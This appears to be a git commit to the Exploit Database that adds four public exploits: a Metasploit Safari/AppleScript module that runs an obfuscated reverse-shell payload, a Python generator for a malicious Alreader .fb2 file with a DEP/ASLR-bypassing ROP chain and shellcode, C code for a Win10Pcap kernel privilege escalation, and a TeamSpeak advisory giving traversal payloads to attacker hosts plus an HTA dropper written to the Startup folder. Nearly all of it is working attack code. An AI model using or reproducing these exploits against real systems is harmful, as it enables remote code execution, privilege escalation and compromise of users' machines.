DB: 2015-10-27

4 new exploits
This commit is contained in:
Offensive Security 2015-10-27 05:02:38 +00:00
parent a3e2d9b7a2
commit d0e0fe5941
5 changed files with 885 additions and 0 deletions

View file

@ -34791,6 +34791,7 @@ id,file,description,date,author,platform,type,port
38510,platforms/php/webapps/38510.txt,"WordPress Securimage-WP Plugin 'siwp_test.php' Cross Site Scripting Vulnerability",2013-05-11,"Gjoko Krstic",php,webapps,0
38511,platforms/php/webapps/38511.txt,"Gallery Server Pro Arbitrary File Upload Vulnerability",2013-05-14,"Drew Calcott",php,webapps,0
38512,platforms/windows/remote/38512.php,"The World Browser 3.0 Final - Remote Code Execution",2015-10-22,"Ehsan Noreddini",windows,remote,0
38513,platforms/windows/remote/38513.txt,"TeamSpeak Client <= 3.0.18.1 - RFI to RCE Exploit",2015-10-22,Scurippio,windows,remote,0
38514,platforms/hardware/webapps/38514.py,"Beckhoff CX9020 CPU Module - Remote Code Execution Exploit",2015-10-22,Photubias,hardware,webapps,0
38515,platforms/php/webapps/38515.txt,"WordPress wp-FileManager Plugin 'path' Parameter Arbitrary File Download Vulnerability",2013-05-15,ByEge,php,webapps,0
38516,platforms/php/webapps/38516.txt,"Open Flash Chart 'get-data' Parameter Cross-Site Scripting Vulnerability",2013-05-14,"Deepankar Arora",php,webapps,0
@ -34806,3 +34807,6 @@ id,file,description,date,author,platform,type,port
38526,platforms/windows/remote/38526.py,"Easy File Sharing Web Server 7.2 - Remote SEH Based Overflow",2015-10-23,Audit0r,windows,remote,0
38527,platforms/php/webapps/38527.txt,"Realtyna RPL Joomla Extension 8.9.2 - Multiple SQL Injection Vulnerabilities",2015-10-23,"Bikramaditya Guha",php,webapps,0
38528,platforms/php/webapps/38528.txt,"Realtyna RPL Joomla Extension 8.9.2 - Persistent XSS And CSRF Vulnerabilities",2015-10-23,"Bikramaditya Guha",php,webapps,0
38532,platforms/windows/local/38532.py,"Alreader 2.5 .fb2 - SEH Based Stack Overflow (ASLR and DEP bypass)",2015-10-25,g00dv1n,windows,local,0
38533,platforms/windows/local/38533.c,"Windows 10 - pcap Driver Local Privilege Escalation",2015-10-26,Rootkitsmm,windows,local,0
38535,platforms/osx/remote/38535.rb,"Safari User-Assisted Applescript Exec Attack",2015-10-26,metasploit,osx,remote,0

Can't render this file because it is too large.

93
platforms/osx/remote/38535.rb Executable file
View file

@ -0,0 +1,93 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::EXE
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Safari User-Assisted Applescript Exec Attack',
'Description' => %q{
In versions of Mac OS X before 10.11.1, the applescript:// URL
scheme is provided, which opens the provided script in the Applescript
Editor. Pressing cmd-R in the Editor executes the code without any
additional confirmation from the user. By getting the user to press
cmd-R in Safari, and by hooking the cmd-key keypress event, a user
can be tricked into running arbitrary Applescript code.
Gatekeeper should be disabled from Security & Privacy in order to
avoid the unidentified Developer prompt.
},
'License' => MSF_LICENSE,
'Arch' => ARCH_CMD,
'Platform' => ['unix', 'osx'],
'Compat' =>
{
'PayloadType' => 'cmd'
},
'Targets' =>
[
[ 'Mac OS X', {} ]
],
'DefaultOptions' => { 'payload' => 'cmd/unix/reverse_python' },
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 16 2015',
'Author' => [ 'joev' ],
'References' =>
[
[ 'CVE', '2015-7007' ],
[ 'URL', 'https://support.apple.com/en-us/HT205375' ]
],
'BrowserRequirements' => {
:source => 'script',
:ua_name => HttpClients::SAFARI,
:os_name => OperatingSystems::Match::MAC_OSX
}
))
register_options([
OptString.new('CONTENT', [false, "Content to display in browser",
"This page has failed to load. Press cmd-R to refresh."]),
OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
], self.class)
end
def on_request_exploit(cli, request, profile)
print_status("Sending #{self.name}")
send_response_html(cli, exploit_html)
end
def exploit_html
"<!doctype html><html><body>#{content}<script>#{exploit_js}</script></body></html>"
end
def exploit_js
js_obfuscate %Q|
var as = Array(150).join("\\n") +
'do shell script "echo #{Rex::Text.encode_base64(sh)} \| base64 --decode \| /bin/sh"';
var url = 'applescript://com.apple.scripteditor?action=new&script='+encodeURIComponent(as);
window.onkeydown = function(e) {
if (e.keyCode == 91) {
window.location = url;
}
};
|
end
def sh
'killall "Script Editor"; nohup ' + payload.encoded
end
def content
datastore['CONTENT']
end
end

463
platforms/windows/local/38532.py Executable file
View file

@ -0,0 +1,463 @@
#!/usr/bin/env python
#*************************************************************************************************************
# Exploit Title: Alreader 2.5 .fb2 SEH Based Stack Overflow (ASLR and DEP bypass)
# Date: 25.10.2015
# Category: Local Exploit
# Exploit Author: g00dv1n
# Contact: g00dv1n.private@gmail.com
# Version: 2.5
# Tested on: Windows XP SP3 / Windows 7 / Windows 8
# Vendor Homepage: http://www.alreader.com/index.php?lang=en
# Software Link (ENG): http://www.alreader.com/download.php?file=AlReader2.Win32.en.zip
# Software Link (RU): http://www.alreader.com/download.php?file=AlReader2.Win32.ru.zip
# CVE:
# Description:
# Alreader 2.5 its free FB2 reader for Windows.
# FB2 format its just XML. FB2 contain <author> <first-name> </first-name> </author> block.
# Overflow occurs if you create a long name of the author.
# App used WCHAR (1 char - 2 bytes ). If we create file in UTF-8 then app turn every single byte into two.
# For example 41 41 - 00 41 00 41
# So We should use UTF-16.
#
# Also, we can use single null byte in payload.
#
#
#
# Instructions:
# 1. Run this py script for generate AlReader-fb2-PoC-exploit.fb2 file.
# 2. Run Alreader.exe
# 3. Open AlReader-fb2-PoC-exploit.fb2 ( FILE -> Open )
# 4. Enjoy running Calc.exe
#
# Exploit owerview:
# For bypass ALSR I used a ROP style. Main module Alreader2.exe non-ALSR. It also contain calls GetModuleHandleW
# and GetProcAdress. So using this functions I can get pointer to call VirtualProtect to make stack executable and
# run Shellcode.
#
# At overflow overwritten SEH. So we can control EIP. For this spray Jump Adress in payload
# ( It is necessary to adjust the offset in different systems .)
# Then to get control of the stack we need ADD to ESP some value. (ADD ESP, 808h). Then ESP will point to ROP NOP
# ( It is necessary to adjust the offset in different systems .)
# Then the control get ROP chain .
#
# Program have Russian (RU) and English (Eng) versions.
# ROP chains for them the same but different addresses. ( addresses of ADD ESP, 808h and ROP NOP same for all versions )
# For a combination of two versions into one exploit I place two ROP chains one after another.
# For RU version then an exception occurs, control passes first ROP chain. (ADD ESP, 808h RETN 4 then ROP NOPs )
# For Eng version after ADD ESP, 808h RETN 4 and ROP NOPs arises yet another exepiton and Call ADD ESP, 808h.
# So ESP jump over first ROP chain. ROP NOP correct offset and Second ROP chain for Eng version, get control.
# With these tricks, the exploit works correctly for both versions.
#
# Below is ANSI-diagram of the payload:
#
# =-------------------------=
# | gdvn | just fan magic bytes
# |-------------------------|
# | |
# | jmp from SEH adress | x 500 Spray Andress to Jump from oveeride SEH
# | | (ADD ESP, 808h RETN 4)
# |-------------------------|
# | |
# | ROP NOP | x 500 Spray ROP NOP (RETN)
# | |
# |-------------------------|
# | |
# | ROP chain for |
# | RU version |
# | |
# |-------------------------|
# | SHELLCODE | Run Calc.exe
# |-------------------------|
# | |
# | ROP NOP | x 250 Spray ROP NOP (RETN)
# | |
# |-------------------------|
# | |
# | ROP chain for |
# | ENG version |
# | |
# |-------------------------|
# | SHELLCODE | Run Calc.exe
# |-------------------------|
# | |
# | ROP chain for |
# | ENG version |
# | |
# |-------------------------|
# | |
# | |
# | Junk | 'A' x 6000
# | |
# | |
# =-------------------------=
#
#
#
#
#
#**************************************************************************************************************
#######################################################################################################
from struct import *
#######################################################################################################
file_result = "AlReader-fb2-PoC-exploit.fb2"
########################################################################################################
fuz_text = '' # init fuzzy string
jmp_to = pack('<I',0x00442391 ) # 0x00442391 ADD ESP, 808h RETN 4
ret_NOP = pack('<I',0x00448147 ) # RETN
##################################### START CREATE ROP CHAINs ############################################
fuz_text += 'gdvn' # magic init bytes
fuz_text += jmp_to * 500 # spray adr
fuz_text += ret_NOP * 500 # spray RETN adr
####################################### ROP CHAIN FOR RUS VERSION ########################################
# Prepare to call GetModuleHandleW
# EDI = GetModuleHandleW adr
# ESI = ret adr
# EBP = ptr to unicode 'kernel32.dll'
ret_adr_after = pack('<I',0x0048ddd1 ) # 0x0048ddd1 : # ADD ESP,30 # RETN ( this need to correct ESP )
module_handlew_adr = pack('<I',0x004FC8FC ) # 0x004FC8FC GetModuleHandleW adr
kernel32_u = pack('<I',0x0560944 ) # 0x0560944 ptr to unicode 'kernel32.dll'
#0x004904a6 : # POP EDI # POP ESI # POP EBP # POP EBX # RETN
fuz_text += pack('<I',0x004904a6 ) + module_handlew_adr + ret_adr_after + kernel32_u
fuz_text += '\x41' * 4
fuz_text += pack('<I',0x004f831c ) # 0x004f831c # ADD ESP,24 # RETN
fuz_text += '\x41' * 36
fuz_text += pack('<I',0x004b310d ) # 0x004b310d : # PUSHAD # RETN
fuz_text += '\x41' * 28 # correct after ADD ESP,30
#Junk
#################################################
fuz_text += pack('<I',0x004f831c ) # 0x004f831c # ADD ESP,24 # RETN
fuz_text += '\x41' * 36
#################################################
#EAX = kernel32 base adr
# Prepare to call GetProcAdress
# EDI = GetProcAdress adr
# ESI = ret adr
# EBP = kernel32 base adr
# ESP = ptr to ANSII 'VirtualProtect00'
ret_adr_after = pack('<I',0x0048ddd1 ) # 0x0048ddd1 : # ADD ESP,30 # RETN ( this need to correct ESP )
get_proc_adr = pack('<I',0x0043C8B2 ) # 0x0043C8B2 - GetProcAdress
# 0x004904A8 : # POP EDI # POP ESI # POP EBP # POP EBX # RETN
fuz_text += pack('<I',0x004904A8 ) + get_proc_adr + ret_adr_after
fuz_text += '\x41' * 8
fuz_text += pack('<I',0x004b9e9e ) # 0x004b9e9e : # XCHG EAX,EBP # SETE CL # MOV EAX,ECX # RETN
fuz_text += pack('<I',0x004b310d ) # 0x004b310d : # PUSHAD # RETN
fuz_text += 'VirtualProtect' + '\x00'
fuz_text += '\x41' * 17 # correct ESP pointer
########################################################
# Prepare registrs for Virtual protect call
# EDI = ROP NOP
# ESI = VirtualProtect adr
# EBP = Ret adr
# ESP = auto
# EBX = 1
# EDX = 0x40
# ECX = lpOldProtect (ptr to W address)
# Now in EAX VP adr
fuz_text += pack('<I',0x00489cdd ) # 0x00489cdd, # PUSH EAX # POP ESI # RETN
fuz_text += pack('<I',0x004a6392 ) # 0x004a6392, # POP EBX # RETN
fuz_text += pack('<I',0x5DE58BD1 ) # 0x5DE58BD0, # EBX = 5DE58BD1
fuz_text += pack('<I',0x004e7d31 ) # 0x004e7d31, # SUB EBX,5DE58BD0 # RETN # EBX = 1
fuz_text += pack('<I',0x004fc23c ) # 0x004fc23c, # XOR EDX,EDX # RETN # EDX = 0
fuz_text += pack('<I',0x0040db04 ) * 64 # 0x0040db04, # INC EDX # ADD AL,3B # RETN x 64 # EDX = 0x40
fuz_text += pack('<I',0x0048c064 ) # 0x0048c064, # POP ECX # RETN
fuz_text += pack('<I',0x00629eea ) # 0x00629eea, # &Writable location
fuz_text += pack('<I',0x00487d6a ) # 0x00487d6a, # POP EDI # RETN
fuz_text += pack('<I',0x004f4401 ) # 0x004f4401, # RETN (ROP NOP)
fuz_text += pack('<I',0x004e6379 ) # 0x004e6379, # POP EBP # RETN
ret_adr_after = pack('<I',0x004f831c ) # ret adr # 0x004f831c # ADD ESP,24 # RETN
fuz_text += ret_adr_after
fuz_text+= pack('<I',0x004ecfab ) # 0x004ecfab, # PUSHAD # RETN
fuz_text += '\x41' * 32 # Correct poiter to ESP
fuz_text += pack('<I',0x004a37bd ) # 0x004a37bd : # jmp esp
fuz_text += '\x90' * 16 # NOP's :-)
##################################### END ROP CHAIN #########################################
#############################################################################################
#PASTE SHELLCODE HERE
# Run Calc
shellcode = ("\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
"\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61"
"\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7");
fuz_text += shellcode
#############################################################################################
fuz_text += ret_NOP * 250 # spray RETN adr
#############################################################################################
############################### ROP CHAIN FOR ENG VERSION ###################################
# Prepare to call GetModuleHandleW
# EDI = GetModuleHandleW adr
# ESI = ret adr
# EBP = ptr to unicode 'kernel32.dll'
ret_adr_after = pack('<I',0x004cad21 ) # 0x004cad21 : # ADD ESP,30 # RETN ( this need to correct ESP )
module_handlew_adr = pack('<I',0x004FC85C ) # 0x004FC85C GetModuleHandleW adr
kernel32_u = pack('<I',0x00560724 ) # 0x00560724 ptr to unicode 'kernel32.dll'
#0x00488ed6 : # POP EDI # POP ESI # POP EBP # POP EBX # RETN
fuz_text += pack('<I',0x00488ed6 ) + module_handlew_adr + ret_adr_after + kernel32_u
fuz_text += '\x41' * 4
fuz_text += pack('<I',0x004a8ee8 ) # 0x004a8ee8 # ADD ESP,24 # RETN
fuz_text += '\x41' * 36
fuz_text += pack('<I',0x004b3ded ) # 0x004b3ded : # PUSHAD # RETN
fuz_text += '\x41' * 28 # correct after ADD ESP,30
#Junk
#################################################
fuz_text += pack('<I',0x004a8ee8 ) # 0x004a8ee8 # ADD ESP,24 # RETN
fuz_text += '\x41' * 36
#################################################
#EAX = kernel32 base adr
# Prepare to call GetProcAdress
# EDI = GetProcAdress adr
# ESI = ret adr
# EBP = kernel32 base adr
# ESP = ptr to ANSII 'VirtualProtect00'
ret_adr_after = pack('<I',0x004cad21 ) # 0x004cad21 : # ADD ESP,30 # RETN ( this need to correct ESP )
get_proc_adr = pack('<I',0x0043C8B2 ) # 0x0043C8B2 - GetProcAdress
# 0x00488ed6 : # POP EDI # POP ESI # POP EBP # POP EBX # RETN
fuz_text += pack('<I',0x00488ed6 ) + get_proc_adr + ret_adr_after
fuz_text += '\x41' * 8
fuz_text += pack('<I',0x004b9dfe ) # 0x004b9dfe : # XCHG EAX,EBP # SETE CL # MOV EAX,ECX # RETN
fuz_text += pack('<I',0x004b3ded ) # 0x004b3ded : # PUSHAD # RETN
fuz_text += 'VirtualProtect' + '\x00'
fuz_text += '\x41' * 17 # correct ESP pointer
########################################################
# Prepare registrs for Virtual protect call
# EDI = ROP NOP
# ESI = VirtualProtect adr
# EBP = Ret adr
# ESP = auto
# EBX = 1
# EDX = 0x40
# ECX = lpOldProtect (ptr to W address)
# Now in EAX VP adr
fuz_text += pack('<I',0x00489c3d ) # 0x00489c3d, # PUSH EAX # POP ESI # RETN
fuz_text += pack('<I',0x00481c40 ) # 0x00481c40, # POP EBX # RETN
fuz_text += pack('<I',0x5DE58BD1 ) # 0x5DE58BD0, # EBX = 5DE58BD1
fuz_text += pack('<I',0x004e7c91 ) # 0x004e7c91, # SUB EBX,5DE58BD0 # RETN # EBX = 1
fuz_text += pack('<I',0x004fc19c ) # 0x004fc19c, # XOR EDX,EDX # RETN
fuz_text += pack('<I',0x0040db04 ) * 64 # 0x0040db04, # INC EDX # ADD AL,3B # RETN x 64 # EDX = 0x40
fuz_text += pack('<I',0x004f39dc ) # 0x004f39dc, # POP ECX # RETN
fuz_text += pack('<I',0x0062909d ) # 0x0062909d, # &Writable location
fuz_text += pack('<I',0x00495df4 ) # 0x00495df4, # POP EDI # RETN
fuz_text += pack('<I',0x00483a02 ) # 0x00483a02, # RETN (ROP NOP)
fuz_text += pack('<I',0x004fb3c6 ) # 0x004fb3c6, # POP EBP # RETN
ret_adr_after = pack('<I',0x004a8ee8 ) # ret adr # 0x004a8ee8 # ADD ESP,24 # RETN
fuz_text += ret_adr_after
fuz_text+= pack('<I',0x004b3ded ) # 0x004b3ded, # PUSHAD # RETN
fuz_text += '\x41' * 32 # Correct poiter to ESP
fuz_text += pack('<I',0x004757a7 ) # 0x004757a7 : # jmp esp
fuz_text += '\x90' * 16 # NOP's :-)
fuz_text += shellcode
##############################################################################################
fuz_text += '\x41' * 6000 # final junk
################################ GENERATE utf-16 fb2 file ####################################
start = '''
<?xml version="1.0" encoding="unicode-utf_16"?>
<FictionBook xmlns="http://www.gribuser.ru/xml/fictionbook/2.0" xmlns:l="http://www.w3.org/1999/xlink">
<description>
<title-info>
<author>
<first-name>
'''
end = '''
<middle-name/>
<last-name/>
</author>
<book-title>EXPLOIT TEST</book-title>
</title-info>
</description>
</FictionBook>
'''
start_u = start.encode('utf-16')
end_u = end.encode('utf-16')
fout = open(file_result, 'wb')
fout.write(start_u)
fout.close()
fout = open(file_result,'ab')
fout.write(fuz_text)
fout.close()
fout = open(file_result,'ab')
fout.write(end_u)
fout.close()
print "[*] File successfully created !!\n\n"

193
platforms/windows/local/38533.c Executable file
View file

@ -0,0 +1,193 @@
## Source: https://github.com/Rootkitsmm/Win10Pcap-Exploit
#include <stdio.h>
#include <tchar.h>
#include<Windows.h>
#include<stdio.h>
#include <winternl.h>
#include <intrin.h>
#include <psapi.h>
#include <strsafe.h>
#include <assert.h>
#define SL_IOCTL_GET_EVENT_NAME CTL_CODE(0x8000, 1, METHOD_NEITHER, FILE_ANY_ACCESS)
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xc0000004L)
/* found with :
!token
1: kd> dt nt!_OBJECT_HEADER
+0x000 PointerCount : Int4B
+0x004 HandleCount : Int4B
+0x004 NextToFree : Ptr32 Void
+0x008 Lock : _EX_PUSH_LOCK
+0x00c TypeIndex : UChar
+0x00d TraceFlags : UChar
+0x00e InfoMask : UChar
+0x00f Flags : UChar
+0x010 ObjectCreateInfo : Ptr32 _OBJECT_CREATE_INFORMATION
+0x010 QuotaBlockCharged : Ptr32 Void
+0x014 SecurityDescriptor : Ptr32 Void
+0x018 Body : _QUAD
TypeIndex is 0x5
*/
#define HANDLE_TYPE_TOKEN 0x5
// Undocumented SYSTEM_INFORMATION_CLASS: SystemHandleInformation
const SYSTEM_INFORMATION_CLASS SystemHandleInformation =
(SYSTEM_INFORMATION_CLASS)16;
// The NtQuerySystemInformation function and the structures that it returns
// are internal to the operating system and subject to change from one
// release of Windows to another. To maintain the compatibility of your
// application, it is better not to use the function.
typedef NTSTATUS (WINAPI * PFN_NTQUERYSYSTEMINFORMATION)(
IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength OPTIONAL
);
// Undocumented structure: SYSTEM_HANDLE_INFORMATION
typedef struct _SYSTEM_HANDLE
{
ULONG ProcessId;
UCHAR ObjectTypeNumber;
UCHAR Flags;
USHORT Handle;
PVOID Object;
ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, *PSYSTEM_HANDLE;
typedef struct _SYSTEM_HANDLE_INFORMATION
{
ULONG NumberOfHandles;
SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
// Undocumented FILE_INFORMATION_CLASS: FileNameInformation
const FILE_INFORMATION_CLASS FileNameInformation =
(FILE_INFORMATION_CLASS)9;
// The NtQueryInformationFile function and the structures that it returns
// are internal to the operating system and subject to change from one
// release of Windows to another. To maintain the compatibility of your
// application, it is better not to use the function.
typedef NTSTATUS (WINAPI * PFN_NTQUERYINFORMATIONFILE)(
IN HANDLE FileHandle,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PVOID FileInformation,
IN ULONG Length,
IN FILE_INFORMATION_CLASS FileInformationClass
);
// FILE_NAME_INFORMATION contains name of queried file object.
typedef struct _FILE_NAME_INFORMATION {
ULONG FileNameLength;
WCHAR FileName[1];
} FILE_NAME_INFORMATION, *PFILE_NAME_INFORMATION;
void* FindTokenAddressHandles(ULONG pid)
{
/////////////////////////////////////////////////////////////////////////
// Prepare for NtQuerySystemInformation and NtQueryInformationFile.
//
// The functions have no associated import library. You must use the
// LoadLibrary and GetProcAddress functions to dynamically link to
// ntdll.dll.
HINSTANCE hNtDll = LoadLibrary(_T("ntdll.dll"));
assert(hNtDll != NULL);
PFN_NTQUERYSYSTEMINFORMATION NtQuerySystemInformation =
(PFN_NTQUERYSYSTEMINFORMATION)GetProcAddress(hNtDll,
"NtQuerySystemInformation");
assert(NtQuerySystemInformation != NULL);
/////////////////////////////////////////////////////////////////////////
// Get system handle information.
//
DWORD nSize = 4096, nReturn;
PSYSTEM_HANDLE_INFORMATION pSysHandleInfo = (PSYSTEM_HANDLE_INFORMATION)
HeapAlloc(GetProcessHeap(), 0, nSize);
// NtQuerySystemInformation does not return the correct required buffer
// size if the buffer passed is too small. Instead you must call the
// function while increasing the buffer size until the function no longer
// returns STATUS_INFO_LENGTH_MISMATCH.
while (NtQuerySystemInformation(SystemHandleInformation, pSysHandleInfo,
nSize, &nReturn) == STATUS_INFO_LENGTH_MISMATCH)
{
HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
nSize += 4096;
pSysHandleInfo = (SYSTEM_HANDLE_INFORMATION*)HeapAlloc(
GetProcessHeap(), 0, nSize);
}
for (ULONG i = 0; i < pSysHandleInfo->NumberOfHandles; i++)
{
PSYSTEM_HANDLE pHandle = &(pSysHandleInfo->Handles[i]);
if (pHandle->ProcessId == pid && pHandle->ObjectTypeNumber == HANDLE_TYPE_TOKEN)
{
printf(" ObjectTypeNumber %d , ProcessId %d , Object %p \r\n",pHandle->ObjectTypeNumber,pHandle->ProcessId,pHandle->Object);
return pHandle->Object;
}
}
/////////////////////////////////////////////////////////////////////////
// Clean up.
//
HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
return 0;
}
void main()
{
DWORD dwBytesReturned;
DWORD ShellcodeFakeMemory;
HANDLE token;
// first create toke handle so find object address with handle
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_QUERY,&token))
DebugBreak();
void* TokenAddress = FindTokenAddressHandles(GetCurrentProcessId());
CloseHandle(token);
// i dont want write fully weaponized exploit so criminal must write code to find "WTCAP_A_{B8296C9f-8ed4-48A2-84A0-A19DB94418E3" in runtime ( simple task :)
HANDLE hDriver = CreateFileA("\\\\.\\WTCAP_A_{B8296C9f-8ed4-48A2-84A0-A19DB94418E3}",GENERIC_READ | GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
if(hDriver!=INVALID_HANDLE_VALUE)
{
fprintf(stderr," Open Driver OK\n");
if (!DeviceIoControl(hDriver, SL_IOCTL_GET_EVENT_NAME, NULL,0x80,(void*)((char*)TokenAddress+0x34),NULL,&dwBytesReturned, NULL))
{
fprintf(stderr,"send IOCTL error %d.\n",GetLastError());
return;
}
else fprintf(stderr," Send IOCTL OK\n");
}
else
{
fprintf(stderr," Open Driver error %d.\n",GetLastError());
return;
}
CloseHandle(hDriver);
getchar();
}

View file

@ -0,0 +1,132 @@
Exploit Title: "PwnSpeak" a 0day Exploit for TeamSpeak Client <= 3.0.18.1 RFI to RCE
Date: 12/10/2015
Author: Scurippio <scurippio@anche.no> / (0x6FB30B11 my pgp keyid)
Vendor Homepage: https://www.teamspeak.com/
Application: TeamSpeak 3
Version: TeamSpeak3 Client 3.0.0 - 3.0.18.1
Platforms: Windows, Mac OS X and Linux
Exploitation: Remote
Risk : Very High
=========
The Bug
=========
The bug is a simple but Critical RFI(Remote File Inclusion), and in my test case on "Windows" you can reach remote code execution.
By changing the channel description you can insert a [img] bb tag with malicious content.
There are a few problems with the image caching on disk.
1: There is no check on file extension.
2: There is no file renaming, and you can fake the extension so you can create in the cache a malicious executable file like hta, scr, msi, pif, vbs etc.
Example:
[img] http://yourevilhost.com/thefile.hta [/img]
[img] http://yourevilhost.com/thefile.msi [/img]
[img] http://yourevilhost.com/thefile.vbs [/img]
...
3: Teamspeak 3 Client saves the image and recreates the same directory structure as the server where it's hosted.
Example:
C:\Users\YourUser\AppData\Roaming\TS3Client\cache\remote\yourevilhost.com\thefile.hta
C:\Users\YourUser\AppData\Roaming\TS3Client\cache\remote\yourevilhost.com\thefile.msi
C:\Users\YourUser\AppData\Roaming\TS3Client\cache\remote\yourevilhost.com\thefile.vbs
...
4: It is possible to do a Directory Traversal with a simple urlencode of the traversal path bypassing the built-in control.
This is the critical hole, if you combine the previous vulnerabilities you can save a malicious file in any path on the OS with the same permissions as Teamspeak client.
Example:
[img]http://evildomain.com/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDesktop%5cOwnedByNonnOreste.hta[/img]
If you set this bbcode on a channel description every user that sees it will download a file named "OwnedByNonnOreste.hta" on their Desktop with 0byte, you can also put images or other file extension!
The built-in image fetcher in the Teamspeak client checks the content type and the file header to check if the response is a real image, but you can easily bypass this control and put your exploit payload.
==========================================
Bypass / Vector / Payload
==========================================
To bypass the control and put arbitrary data in your malicious file you only need a web server and you can easily set the Rewrite rule for the Exploitation.
Example:
RewriteEngine On
RewriteCond %{REQUEST_URI} !/faker.php
RewriteRule .* /faker.php
Then you need to write a simple php script to fake the payload as a png by sending the right content type and file header.
Example:
<?php
header ('Content-type: image/png');
echo "\211PNG\r\n\032\n";
?>
<html>
<head>
<title>PWN3D</title>
<HTA:APPLICATION
APPLICATIONNAME="OwnedByScurippio"
ID="SnappySnappySna"
VERSION="1.0"/>
<script language="VBScript">
Sub RunProgram
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc.exe"
End Sub
RunProgram
</script>
</head>
</html>
If you save the file in the windows startup directory you can achieve a remote code execution.
Example:
[img]http://example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cRoaming%5cMicrosoft%5cWindows%5cStart%20Menu%5cPrograms%5cStartup%5cWelcomeAndOwnedByNonnOreste.hta[/img]
[img]http://example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cRoaming%5cMicrosoft%5cWindows%5cStart%20Menu%5cPrograms%5cStartup%5cWelcomeAndOwnedByNonnOreste.hta[/img]
The HTA file is a prefect vector for this exploit, you can execute trusted vb script (shell command or anything else) and the png header doesn't compromise the markup language syntax.
At the next OS boot the victim will execute the malicious HTA file.
=======
Fix
=======
Update to beta channel or wait the 3.0.18.2 hotfix for this exploit!
======
Info
======
10/20/2015 - I have reported this Vulnerability to Teamspeak developers team
********* - Release the public exploit
- Fuck the 'Captatori' - Tracciabili
(Snappy is always with you :P )
Copyright (c) 2015 Scurippio
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.